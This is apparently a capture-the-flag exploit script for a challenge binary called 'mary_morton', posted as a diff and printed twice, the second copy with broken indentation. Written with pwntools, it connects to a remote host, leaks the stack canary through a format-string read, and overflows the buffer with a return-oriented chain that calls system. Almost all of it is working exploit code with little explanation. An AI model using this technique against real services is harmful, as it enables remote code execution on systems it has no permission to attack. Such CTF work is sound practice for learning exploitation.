0xPwny · September 12, 2017 22:14
diff --git a/exploit.py b/exploit.py
 #!/usr/bin/python

 from pwn import *

 #r = process("./mary_morton")
 r = remote('146.185.132.36',19153)

 def fmtstr(pld):
 	r.recvuntil('Exit')
 	r.sendline("2")
 	r.sendline(pld)
 	r.recvline()
 	data = int(r.recvline().strip(" "),16)
 	return data

 def stackbof(pld):
 	r.recvuntil("Exit")
 	r.sendline("1")
 	r.sendline(pld)
 	r.recvline()
 	r.recvline()
 	print r.recvline()
 	
 poprdi = 0x0400ab3
 system = 0x04006a0
 flag = 0x00400b2b

 canary = fmtstr("%23$p") #leak the canary address , it can be found at offset 23

 payload = "A"*136       #buffsize
 payload += p64(canary)  #canary to avoid stack smashing detected
 payload += "BBBBCCCC"   #pad
 payload += p64(poprdi) # pop command to rdi to system executed with it
 payload += p64(flag)  
 payload += p64(system) 

 stackbof(payload)
	#!/usr/bin/python

	from pwn import *

	#r = process("./mary_morton")
	r = remote('146.185.132.36',19153)

	def fmtstr(pld):
	r.recvuntil('Exit')
	r.sendline("2")
	r.sendline(pld)
	r.recvline()
	data = int(r.recvline().strip(" "),16)
	return data

	def stackbof(pld):
	r.recvuntil("Exit")
	r.sendline("1")
	r.sendline(pld)
	r.recvline()
	r.recvline()
	print r.recvline()

	poprdi = 0x0400ab3
	system = 0x04006a0
	flag = 0x00400b2b

	canary = fmtstr("%23$p") #leak the canary address , it can be found at offset 23

	payload = "A"*136 #buffsize
	payload += p64(canary) #canary to avoid stack smashing detected
	payload += "BBBBCCCC" #pad
	payload += p64(poprdi) # pop command to rdi to system executed with it
	payload += p64(flag)
	payload += p64(system)

	stackbof(payload)